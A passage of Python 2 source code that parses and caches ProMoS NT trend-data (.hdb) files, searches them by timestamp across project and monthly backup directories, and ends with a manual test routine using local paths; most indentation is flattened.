# DBData_Timestamp_Search_Result() has three lists of DBData elements:
# begin and end of three lists don't overlap because they represent three different points in time:
# [before_begin, ..., before_end] [exact_begin, ..., exact_end] [after_begin, ..., after_end]
# (based on examples from https://docs.python.org/2/library/bisect.html )
try:
# try to get it directly from dictionary
search_result = DBData_Timestamp_Search_Result()
search_result.before_list = []
search_result.exact_list = self._indexed_by_timestamp[timestamp_datetime]
search_result.after_list = []
except KeyError:
# we have to binary search...
search_result = DBData_Timestamp_Search_Result()
# =>we adapted algorithm from this source: https://hg.python.org/cpython/file/2.7/Lib/bisect.py
# Find list ("bisect.bisect_left()")
low = 0
high = len(self._indexed_by_index)
while low < high:
mid = (low + high) // 2
dbdata_list = self._indexed_by_index[mid]
if dbdata_list[0].get_datetime() < timestamp_datetime:
low = mid + 1
else:
high = mid
idx_after = low
# now we have to interpret the given index:
# FIXME: should we care for corrupted trendfiles? (e.g. an empty file would throw IndexError-exception...)
if idx_after == 0:
# timestamp_datetime is older than our trenddata
search_result.before_list = []
search_result.exact_list = []
search_result.after_list = self._indexed_by_index[0]
elif idx_after == len(self._indexed_by_index):
# timestamp_datetime is younger than our trenddata
search_result.before_list = self._indexed_by_index[-1]
search_result.exact_list = []
search_result.after_list = []
else:
# timestamp_datetime must be between timestamps in our trenddata
search_result.before_list = self._indexed_by_index[idx_after - 1]
search_result.exact_list = []
search_result.after_list = self._indexed_by_index[idx_after]
return search_result
def get_dbdata_lists_generator(self):
"""
generate lists with DBData-elements grouped by timestamp
(ProMoS NT(c) PDBS daemon stores them in sequence, so they should be sorted by timestamp)
"""
for curr_list in self._indexed_by_index:
yield curr_list
def get_dbdata_list_of_lists(self):
"""
return whole list containing lists with DBData-elements grouped by timestamp
(ProMoS NT(c) PDBS daemon stores them in sequence, so they should be sorted by timestamp)
"""
return self._indexed_by_index
def get_dbdata_timestamps_generator(self):
"""
return all contained timestamps
(they should be in ascending order, ProMoS NT(c) PDBS daemon stores them in sequence in HDB files,
and we put them into an OrderedDict)
"""
return self._indexed_by_timestamp.iterkeys()
class _Cached_Trendfile(object):
"""Metadata and reference to a trendfile object, used by Trendfile_Cache_Handler()"""
# code is adapted from "PSC_file_selector.py"
def __init__(self, fullpath):
self._fullpath = fullpath
self._whole_file = None
self._modification_time = 0
self._filesize = 0
self._last_readtime = -1
def _read_metadata(self):
stat = os.stat(self._fullpath)
self._filesize = stat.st_size
self._modification_time = stat.st_mtime
def get_whole_file(self):
self._read_metadata()
if self._last_readtime != self._modification_time:
# first reading or file changed
self._whole_file = IndexedTrendfile(self._fullpath)
self._last_readtime = self._modification_time
return self._whole_file
def get_metadata(self):
# examples from http://stackoverflow.com/questions/39359245/from-stat-st-mtime-to-datetime
# and http://stackoverflow.com/questions/6591931/getting-file-size-in-python
# and https://docs.python.org/2/library/stat.html
# and http://stackoverflow.com/questions/455612/limiting-floats-to-two-decimal-points
# and http://stackoverflow.com/questions/311627/how-to-print-date-in-a-regular-format-in-python
self._read_metadata()
size = float("{0:.2f}".format(self._filesize / 1024.0))
mod_time = datetime.datetime.fromtimestamp(self._modification_time).strftime("%Y.%m.%d %H:%M:%S")
return size, mod_time
class Trendfile_Cache_Handler(object):
"""
Holds trendfile objects in a cache for more efficiency
=>currently it's one program-wide cache
"""
# class-variable with cache
# =>using OrderedDict() so it's simple to maintain FIFO-cache
# https://docs.python.org/2/library/collections.html#collections.OrderedDict
_trendfile_cache_dict = collections.OrderedDict()
used_cache_size = 0
# soft-limit of maximum cache size
CACHESIZE_KBYTES = 1024 * 50 # 50MBytes
def get_trendfile_obj(self, filename_fullpath, cached=True):
"""optional parameter 'cached': False means working on an isolated Trendfile without interfering other instance holders
(it's possible that these DBData-lists could get corrupted, but I'm not 100% shure...)"""
# maintain FIFO-cache: deleting oldest item if cache is too large
curr_size = 0
for trf in Trendfile_Cache_Handler._trendfile_cache_dict:
size, mod_time = Trendfile_Cache_Handler._trendfile_cache_dict[trf].get_metadata()
curr_size = curr_size + size
while curr_size > Trendfile_Cache_Handler.CACHESIZE_KBYTES:
# remove oldest item
dumped_obj = Trendfile_Cache_Handler._trendfile_cache_dict.popitem(last=False)
# handling request
if cached:
if not filename_fullpath in Trendfile_Cache_Handler._trendfile_cache_dict:
# first time handling of this file...
Trendfile_Cache_Handler._trendfile_cache_dict[filename_fullpath] = _Cached_Trendfile(filename_fullpath)
return Trendfile_Cache_Handler._trendfile_cache_dict[filename_fullpath].get_whole_file()
else:
# bypass whole caching
return IndexedTrendfile(filename_fullpath)
class MetaTrendfile(object):
"""
provides all trenddata of a specific DMS datapoint from HDB files in project directory and backup directory
"""
def __init__(self, projectpath_str, dms_dp_str):
self.projectpath_str = projectpath_str
self.dms_dp_str = dms_dp_str
self.dat_dir = os.path.join(projectpath_str, 'dat')
self.backup_dir = self._get_backup_dir()
self.backup_subdirs_dict = self._find_backup_subdirs() # stores subdir as string (key: tuple (year, month))
self.trend_filename_str = self._get_trend_filename()
self.trf_cache_handler = Trendfile_Cache_Handler()
# timezone awareness (FIXME: currently fixed to 'Europe/Zurich')
_tz = timezone.Timezone().get_tz()
def _get_backup_dir(self):
# we have to read INI-file <projectpath>\cfg\PDBSBACK.CFG
# and get this attribut:
# [Backup]
# Path=D:\Trend
cfg_parser = configparser.ConfigParser()
configfile_fullpath = os.path.join(self.projectpath_str, 'cfg', 'PDBSBACK.CFG')
cfg_parser.read(configfile_fullpath)
return cfg_parser["Backup"]["Path"]
def _get_trend_filename(self):
# FIXME: I assume that all illegal characters in a DMS-datapoint gets replaced by "_" for getting a valid filename....
# FIXME: It's a known problem that these datapoints stores trends in the SAME TRENDFILE (=>corrupted trend!!!)
# FIXME: should we abort processing file if we can't find a file with the right DMS-DP-string in trendfile-header?
# MSR_U02:Test:L01_02:foo:Input
# MSR_U02:Test:L01:02:foo:Input
# MSR_U02:Test:L01:02_foo:Input
# ===>trenddata of all three TRD-datapoints were combined into file "MSR_U02_Test_L01_02_foo_Input.hdb" !!!
# some help from http://stackoverflow.com/questions/295135/turn-a-string-into-a-valid-filename
# =>now we restrict filename and hope PDBS does it the same way...
valid_chars = set(string.ascii_letters) | set(string.digits)
char_list = []
for char in self.dms_dp_str:
if char in valid_chars:
char_list.append(char)
else:
char_list.append('_')
return ''.join(char_list) + '.hdb'
def _find_backup_subdirs(self):
"""
get a list of available backup subdirectories
"""
mydict = {}
regex_pattern = r'Month_(?P<month>\d\d)\.(?P<year>\d\d\d\d)'
for subdir in os.listdir(self.backup_dir):
# an example for backup subdirectory:
# february 2017: "Month_02.2017"
m = re.match(regex_pattern, subdir)
if m:
# key in our dictionary: tuple (year, month) => value is whole regex match
key = m.group('year'), m.group('month')
mydict[key] = m.group(0)
return mydict
def _get_backup_subdir(self, timestamp_datetime):
"""
locate trenddata by timestamp
"""
# an example for backup subdirectory:
# february 2017: "Month_02.2017"
month = timestamp_datetime.strftime('%m')
year = timestamp_datetime.strftime('%Y')
return ''.join(['Month_', month, '.', year])
def _get_endpoint_timestamp(self, position_str="first"):
"""
returns timestamp of our oldest or youngest DBData element,
combined from dat- and backup directory.
=>parameter position_str is either "first" or "last"
("first" is default, anything other means "last")
"""
endpoint_timestamp_list = []
try:
# searching in project directory
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
if os.path.exists(filename_fullpath):
# processing this trendfile
if position_str == "first":
# getting oldest DBData
found_timestamp = dat_trendfile.get_first_timestamp()
else:
# getting youngest DBData
found_timestamp = dat_trendfile.get_last_timestamp()
endpoint_timestamp_list.append(found_timestamp)
except Exception as ex:
print('WARNING: MetaTrendfile._get_endpoint_timestamp(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
# searching in backup subdirectory
if position_str == "first":
# searching oldest DBData =>ascending sorting
reversed = False
else:
# searching youngest DBData =>descending sorting
reversed = True
filename_fullpath = ''
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=reversed):
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it contains perhaps older trenddata than in project dir...
break
if filename_fullpath:
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
if position_str == "first":
# getting oldest DBData
found_timestamp = bak_trendfile.get_first_timestamp()
else:
# getting youngest DBData
found_timestamp = bak_trendfile.get_last_timestamp()
endpoint_timestamp_list.append(found_timestamp)
except Exception as ex:
print('WARNING: MetaTrendfile._get_endpoint_timestamp(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
if position_str == "first":
# getting oldest DBData
return min(endpoint_timestamp_list)
else:
# getting youngest DBData
return max(endpoint_timestamp_list)
except ValueError:
# seems we didn't find trenddata (list is empty)
return None
def get_first_timestamp(self):
"""
returns timestamp of our oldest DBData element
"""
return self._get_endpoint_timestamp(position_str="first")
def get_last_timestamp(self):
"""
returns timestamp of our youngest DBData element
"""
return self._get_endpoint_timestamp(position_str="last")
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
=>remember: every search must return either an exact match or the values just before and after it, except first or last DBData!
"""
# FIXME: this method is too heavy and should be optimized... =>rewrite it!!!
search_result_list = []
try:
# searching in project directory
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = dat_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
search_result_list.append(search_result)
except Exception as ex:
print('WARNING: MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
# searching in backup directory:
# first we try to get a "exact_list"-hit, then we
# walk in both directions through directories and choose best match
# for "file containing before_list" <= timestamp <= "file containing after_list"
# trying specific timestamp
# (following flags are preparation for further searching)
bak_searching_past = True
bak_searching_future = True
curr_subdir = self._get_backup_subdir(timestamp_datetime)
filename_fullpath = os.path.join(self.backup_dir, curr_subdir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = bak_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
# got a match... we need to decide how to search further...
search_result_list.append(search_result)
if search_result.exact_list:
# no need to search further...
bak_searching_past = False
bak_searching_future = False
elif search_result.before_list and not search_result.after_list:
bak_searching_past = False
bak_searching_future = True
elif search_result.after_list and not search_result.before_list:
bak_searching_past = True
bak_searching_future = False
except Exception as ex:
print('WARNING: [1] MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
if bak_searching_past:
# walking backwards through available directories
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=True):
backupdir_timestamp = datetime.datetime(year=int(year), month=int(month), day=1, tzinfo=MetaTrendfile._tz)
if backupdir_timestamp < timestamp_datetime:
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it should contain DBData before timestamp...
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = bak_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
search_result_list.append(search_result)
break
except Exception as ex:
print('WARNING: [2] MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
if bak_searching_future:
# walking forward through available directories
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=False):
# with help from http://stackoverflow.com/questions/42950/get-last-day-of-the-month-in-python
last_day_of_month = calendar.monthrange(int(year), int(month))[1]
backupdir_timestamp = datetime.datetime(year=int(year), month=int(month), day=last_day_of_month, tzinfo=MetaTrendfile._tz)
if backupdir_timestamp > timestamp_datetime:
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it should contain DBData after timestamp...
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = bak_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
search_result_list.append(search_result)
break
except Exception as ex:
print('WARNING: [3] MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
# getting closest match from all search results
# FIXME: should we care for mismatch between amount of stored DBData items for one timestamp in DAT and Backup?
combined_sr = DBData_Timestamp_Search_Result()
# first try: getting exact match
if search_result_list:
dbdata_set = set()
for sr in search_result_list:
if sr.exact_list:
# using all DBData elements of all exact search results
dbdata_set.update(sr.exact_list)
if dbdata_set:
# got exact search results... =>give a list back to caller
combined_sr.exact_list = list(dbdata_set)
assert combined_sr.exact_list and not combined_sr.before_list and not combined_sr.after_list, 'exact match for this timestamp expected!'
return combined_sr
# second try: getting match as close as possible from all available sources
if search_result_list:
# collecting closest timestamp-lists
past_timestamp = datetime.datetime(year=1900, month=1, day=1, tzinfo=MetaTrendfile._tz)
future_timestamp = datetime.datetime(year=2100, month=1, day=1, tzinfo=MetaTrendfile._tz)
for sr in search_result_list:
# nearest timestamp in the past ("before_list")
if sr.before_list:
curr_timestamp = sr.before_list[0].get_datetime()
if curr_timestamp > past_timestamp:
# found a closer match
combined_sr.before_list = sr.before_list
past_timestamp = curr_timestamp
elif curr_timestamp == past_timestamp:
# found result from other source => inserting DBData elements in case some were missing
combined_sr.before_list.extend(sr.before_list)
# nearest timestamp in the future ("after_list")
if sr.after_list:
curr_timestamp = sr.after_list[0].get_datetime()
if curr_timestamp < future_timestamp:
# found a closer match
combined_sr.after_list = sr.after_list
future_timestamp = curr_timestamp
elif curr_timestamp == future_timestamp:
# found result from other source => inserting DBData elements in case some were missing
combined_sr.after_list.extend(sr.after_list)
assert not combined_sr.exact_list, 'no exact match for this timestamp expected!'
# get unique DBData elements
dbdata_before_set = set(combined_sr.before_list)
combined_sr.before_list = list(dbdata_before_set)
dbdata_after_set = set(combined_sr.after_list)
combined_sr.after_list = list(dbdata_after_set)
return combined_sr
def get_dbdata_lists_generator(self, start_datetime=None, end_datetime=None):
"""
a generator over all available trenddata for (perhaps) memory efficient retrieving lists with DBData elements,
items with same timestamp are grouped
(caller can only loop once through generator,
read here: http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python )
=>optional arguments allows filtering of DBData elements
=>using something similar like "mergesort" algorithm: https://en.wikipedia.org/wiki/Merge_sort
=>using "deque" objects for efficient popleft: https://docs.python.org/2/library/collections.html#collections.deque
=>using uncached trendfile, since we MODIFY the internal DBData-lists
"""
# FIXME: do a cleaner implementation of this...
# trenddata in project directory:
# =>using one queue
dat_deque = collections.deque()
try:
# trendfile in project directory:
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# disable cache because we alter DBData-list...!!
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=False)
dat_deque = collections.deque(dat_trendfile.get_dbdata_list_of_lists())
except Exception as ex:
print('WARNING: MetaTrendfile.get_dbdata_lists_generator(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
# trenddata in backup subdirectories:
# =>interpretation as one long queue, combined from different trendfiles
# (no subclassing of deque since we don't want to implement all methods of deque()...)
class _deque_wrapper(object):
def __init__(self, backup_subdirs_dict, backup_dir, trend_filename_str, trf_cache_handler):
self._deque_obj = collections.deque()
self._backup_subdirs_dict = backup_subdirs_dict
self._backup_dir = backup_dir
self._trend_filename_str = trend_filename_str
self.trf_cache_handler = trf_cache_handler
self._subdir_iter = iter(sorted(backup_subdirs_dict.keys(), reverse=False))
self._load_next_trendfile()
def _load_next_trendfile(self):
# "deque" is getting empty... trying to append next trendfile
try:
subdir_str = self._backup_subdirs_dict[self._subdir_iter.next()]
filename_fullpath = os.path.join(self._backup_dir, subdir_str, self._trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup file
# disable cache because we alter DBData-list...!!
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=False)
self._deque_obj.extend(bak_trendfile.get_dbdata_list_of_lists())
except StopIteration:
# there are no more backup subdirs to check...
pass
def popleft(self):
# make sure this class contains enough trenddata, then return next element
# (if we let the deque run out of elements, the statement "if bak_deque" would fail)
if len(self._deque_obj) <= 1:
# "deque" is empty... trying to append next trendfile
self._load_next_trendfile()
return self._deque_obj.popleft()
def __len__(self):
# overriding this hook method for allowing getting current size of deque object
# (with help from http://stackoverflow.com/questions/15114023/using-len-and-def-len-self-to-build-a-class
# and http://stackoverflow.com/questions/7816363/if-a-vs-if-a-is-not-none
# )
return len(self._deque_obj)
bak_deque = _deque_wrapper(self.backup_subdirs_dict, self.backup_dir, self.trend_filename_str, self.trf_cache_handler)
# checking tail of both deques and return list with unique DBData elements at oldest timestamp
# =>do until we returned all available trenddata
dat_list = []
bak_list = []
while True:
# get DBData-list from each tail
curr_list = []
if dat_deque and bak_deque:
# both trenddata source available...
# =>only get new items when there's nothing left from earlier round
if not dat_list:
dat_list = dat_deque.popleft()
if not bak_list:
bak_list = bak_deque.popleft()
# return older items to caller
# if we have same timestamp then we collect all unique DBData element
dat_timestamp = dat_list[0].get_datetime()
bak_timestamp = bak_list[0].get_datetime()
if bak_timestamp < dat_timestamp:
curr_list = bak_list
bak_list = []
elif dat_timestamp < bak_timestamp:
curr_list = dat_list
dat_list = []
else:
my_set = set(dat_list + bak_list)
curr_list = list(my_set)
dat_list = []
bak_list = []
elif dat_deque:
# only trenddata in project directory available...
curr_list = dat_deque.popleft()
elif bak_deque:
# only trenddata in backup directory available...
curr_list = bak_deque.popleft()
else:
# no more trenddata left...
curr_list = []
if curr_list:
# check filter
ignore = False
if start_datetime:
if curr_list[0].get_datetime() < start_datetime:
ignore = True
if end_datetime:
if curr_list[0].get_datetime() > end_datetime:
ignore = True
# nothing to do, stop iteration
break
if not ignore:
yield curr_list
else:
# nothing to do, stop iteration
break
def get_search_result_generator(self, start_datetime=None, stop_datetime=None):
"""
a generator creating DBData_Timestamp_Search_Result objects with all available trenddata as exact-list
(reusing all DBData lists from get_dbdata_lists_generator())
"""
for curr_list in self.get_dbdata_lists_generator(start_datetime, stop_datetime):
sr = DBData_Timestamp_Search_Result()
# returning this list of DBData elements as exact search hit
sr.exact_list.extend(curr_list)
yield sr
def get_dbdata_timestamps_generator(self, start_datetime=None, stop_datetime=None):
"""
a generator creating objects with timestamps and time difference to last timestamp of all available trenddata
(contains some copied code from "self.get_DBData_Timestamp_Search_Result(self, timestamp_datetime()" )
"""
# getting generators of all timestamp sources,
# then always yield the oldest timestamp of all active timestamp sources
# helper class for combining timestamp and time difference
class Tstamp(object):
"""
tstamp: timestamp as datetime.datetime object
diff: difference to last timestamp in seconds
"""
old_tstamp_dt = None
def __init__(self, curr_tstamp_dt):
self.tstamp_dt = curr_tstamp_dt
self.is_interpolated = False
if not Tstamp.old_tstamp_dt:
# first run =>first timestamp is always okay and should have timediff = 0
self.timediff = 0.0
else:
self.timediff = (curr_tstamp_dt - Tstamp.old_tstamp_dt).total_seconds()
Tstamp.old_tstamp_dt = curr_tstamp_dt
if not start_datetime:
start_datetime = datetime.datetime.fromtimestamp(0, tz=MetaTrendfile._tz)
if not stop_datetime:
stop_datetime = datetime.datetime(year=3000, month=1, day=1).replace(tzinfo=MetaTrendfile._tz)
prj_iter = iter([])
# trenddata in project directory
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
usable = True
if dat_trendfile.get_last_timestamp() < start_datetime:
# trenddata is too old
usable = False
if dat_trendfile.get_first_timestamp() > stop_datetime:
# trenddata is too new
usable = False
if usable:
prj_iter = dat_trendfile.get_dbdata_timestamps_generator()
# lazily generating timestamp iterators from backup
# (idea from http://stackoverflow.com/questions/15004772/what-is-the-difference-between-chain-and-chain-from-iterable-in-itertools )
def generate_backup_iterators():
# walking forward through available directories
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=False):
				if (start_datetime.year, start_datetime.month) <= (int(year), int(month)) <= (stop_datetime.year, stop_datetime.month):
# current backup directory should contain trenddata in requested timerange
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it should contain trenddata...
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
yield bak_trendfile.get_dbdata_timestamps_generator()
# combine this generator of generators with trenddata from project
bak_iter = itertools.chain.from_iterable(generate_backup_iterators())
tstamp_generator_list = []
for source in [prj_iter, bak_iter]:
try:
# this list always contains head element from iterator, and iterator itself
new_source = [source.next(), source]
tstamp_generator_list.append(new_source)
except StopIteration:
pass
# request items from both generators, always returning smaller value
while tstamp_generator_list:
# consuming timestamps, returning always oldest one, updating first element
# sorting list of tuples: http://stackoverflow.com/questions/10695139/sort-a-list-of-tuples-by-2nd-item-integer-value
# =>getting source list with oldest timestamp
tstamp_generator_list = sorted(tstamp_generator_list, key=itemgetter(0))
oldest_source_list = tstamp_generator_list[0]
curr_tstamp, curr_iter = oldest_source_list[0], oldest_source_list[1]
if curr_tstamp >= start_datetime and curr_tstamp <= stop_datetime:
yield Tstamp(curr_tstamp)
try:
# update head-element of current timestamp source
oldest_source_list[0] = curr_iter.next()
except StopIteration:
# iterator is empty... =>removing this timestamp-source
tstamp_generator_list = tstamp_generator_list[1:]
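# Illustrative sketch (not part of the original code): when every per-file
# generator already yields timestamps in ascending order, the same
# "always take the oldest head element" merge done in the while-loop above
# can be expressed with heapq.merge(). The hand-rolled variant above is kept
# because it also has to track head elements and prune exhausted sources by hand.
def _merged_timestamp_sketch(*sorted_iterators):
    """Yield items from all already-sorted iterators as one globally sorted stream."""
    import heapq
    for tstamp in heapq.merge(*sorted_iterators):
        yield tstamp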
def main(argv=None):
# for filename in ['C:\Promos15\proj\Winterthur_MFH_Schaffhauserstrasse\dat\MSR01_Allg_Aussentemp_Istwert.hdb']:
# #trf = RawTrendfile(filename)
# trf = IndexedTrendfile(filename)
# print('IndexedTrendfile "' + filename + '" contains trenddata of DMS datapoint ' + trf.get_dms_Datapoint())
# print('number of DBData elements: ' + str(trf.get_nof_dbdata_elements()))
# print('number of unique timestamps: ' + str(len(trf._indexed_by_timestamp)))
# print('timestamp of first DBData element: ' + trf.get_first_timestamp().strftime('%Y-%m-%d %H:%M:%S'))
# print('timestamp of last DBData element: ' + trf.get_last_timestamp().strftime('%Y-%m-%d %H:%M:%S'))
# print('(timespan is ' + str((trf.get_last_timestamp() - trf.get_first_timestamp()).days) + ' days)')
#
# # getting some values...
# # hint from http://stackoverflow.com/questions/4741243/how-to-pick-just-one-item-from-a-generator-in-python
# # =>we need to get another generator object when we want to get the same interation!
# for x in range(2):
# print('interpretation of values of some DBData elements: (run number ' + str(x) + ')')
# my_generator = trf.get_dbdata_elements_generator()
# for x in range(10):
# elem = my_generator.next()
# print('as boolean: ' + str(elem.get_value_as_boolean()) + '\tas int: ' + str(elem.get_value_as_int())+ '\tas float: ' + str(elem.get_value_as_float()))
#
# # getting trenddata by timestamp:
# timestamps_list = [datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=23),
# datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=24),
# datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=25),
# datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=13),
# datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=14),
# datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=15)]
# for timestamp in timestamps_list:
# print('getting DBData elements with timestamp "' + timestamp.strftime('%Y-%m-%d %H:%M:%S') + '"')
# result = trf.get_DBData_Timestamp_Search_Result(timestamp)
# print('\t"before_list" contains:')
# for item in result.before_list:
# print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()))
# print('\t"exact_list" contains:')
# for item in result.exact_list:
# print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()))
# print('\t"after_list" contains:')
# for item in result.after_list:
# print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()))
	# trying backup and project directory:
print('######################################################################')
print('\nTEST: MetaTrendfile() ')
mytrf = MetaTrendfile('C:\Promos15\proj\Winterthur_MFH_Schaffhauserstrasse', 'MSR01:Allg:Aussentemp:Istwert')
print('get_first_timestamp(): ' + repr(mytrf.get_first_timestamp()))
print('get_last_timestamp(): ' + repr(mytrf.get_last_timestamp()))
# getting trenddata by timestamp:
timestamps_list = [datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=23, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=24, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=25, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=13, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=14, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=15, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=1950, month=1, day=1, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2999, month=1, day=1, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)
]
for timestamp in timestamps_list:
print('getting DBData elements with timestamp "' + timestamp.strftime('%Y-%m-%d %H:%M:%S') + '"')
result = mytrf.get_DBData_Timestamp_Search_Result(timestamp)
print('\t"before_list" contains:')
for item in result.before_list:
print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()) + ' / ' + item.getStatusBitsString())
print('\t"exact_list" contains:')
for item in result.exact_list:
print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()) + ' / ' + item.getStatusBitsString())
print('\t"after_list" contains:')
for item in result.after_list:
print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()) + ' / ' + item.getStatusBitsString())
# test filtering identical timestamps
print('\n\ntest filtering identical timestamps')
print('######################################')
filename_fullpath = r'C:\Promos15\proj\Winterthur_MFH_Schaffhauserstrasse\dat\MSR01_Allg_Aussentemp_Istwert_LAST_VALUE.hdb'
#trf_test = IndexedTrendfile()
# TESTING cache:
trf_test = Trendfile_Cache_Handler().get_trendfile_obj(filename_fullpath, cached=True)
print('DMS-datapoint= ' + trf_test.get_dms_Datapoint())
print('\tcontained DBData-elements:')
for curr_dbdata in trf_test.get_dbdata_elements_generator():
print('\ttimestamp: ' + repr(curr_dbdata.get_datetime()))
print('\tvalue: ' + str(curr_dbdata.get_value_as_float()))
print('\thash()= ' + str(hash(curr_dbdata)))
print('\n\tDBData-elements retrieved as set():')
for curr_dbdata in trf_test.get_dbdata_elements_as_set():
print('\ttimestamp: ' + repr(curr_dbdata.get_datetime()))
print('\tvalue: ' + str(curr_dbdata.get_value_as_float()))
print('\thash()= ' + str(hash(curr_dbdata)))
# test number of unique timestamps
print('\n\ntest number of unique timestamps')
print('#####################################')
timespans = [#(None, None),
(datetime.datetime(year=2013, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2014, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2014, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2015, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2015, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2016, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2016, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2017, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2017, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2018, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2013, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2020, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=24, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=14, tzinfo=MetaTrendfile._tz))]
for start, end in timespans:
try:
print('\tbetween ' + start.strftime('%Y-%m-%d %H:%M:%S') + ' and ' + end.strftime('%Y-%m-%d %H:%M:%S') + ':')
except AttributeError:
# this is testcase with (None, None)
print('\tin all available trenddata:')
x = 0
for item in mytrf.get_dbdata_lists_generator(start, end):
x = x + 1
